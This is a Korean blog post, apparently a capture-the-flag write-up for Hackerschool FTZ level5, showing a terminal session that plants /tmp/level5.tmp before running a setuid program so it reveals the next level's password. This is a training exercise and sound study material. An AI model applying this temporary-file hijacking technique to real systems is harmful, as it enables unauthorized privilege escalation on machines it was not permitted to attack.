-
해커스쿨 FTZ level5정보보안/포너블 2017. 12. 28. 20:4412345678910111213141516171819202122232425262728login as: level5level5@192.168.244.128's password:[level5@ftz level5]$ lshint public_html tmp[level5@ftz level5]$ cat hint/usr/bin/level5 프로그램은 /tmp 디렉토리에level5.tmp 라는 이름의 임시파일을 생성한다.이를 이용하여 level6의 권한을 얻어라.[level5@ftz level5]$ cd /usr/bin[level5@ftz bin]$ file level5level5: setuid executable, can't read `level5' (Permission denied).[level5@ftz bin]$ level5[level5@ftz bin]$ cd /tmp[level5@ftz tmp]$ lsmysql.sock[level5@ftz tmp]$ cat > level5.tmpasdf[level5@ftz tmp]$ cd /usr/bin[level5@ftz bin]$ level5[level5@ftz bin]$ cd /tmp[level5@ftz tmp]$ lslevel5.tmp mysql.sock[level5@ftz tmp]$ cat level5.tmpnext password : what the hell
cs '정보보안 > 포너블' 카테고리의 다른 글
pwnable.kr 4번 flag (0) 2018.02.04 해커스쿨 FTZ level6~9 (0) 2018.01.05 pwnable.kr 3번 bof (0) 2017.12.27 pwnable.kr 2번 collision (0) 2017.12.26 pwnable.kr 1번 fd (0) 2017.12.26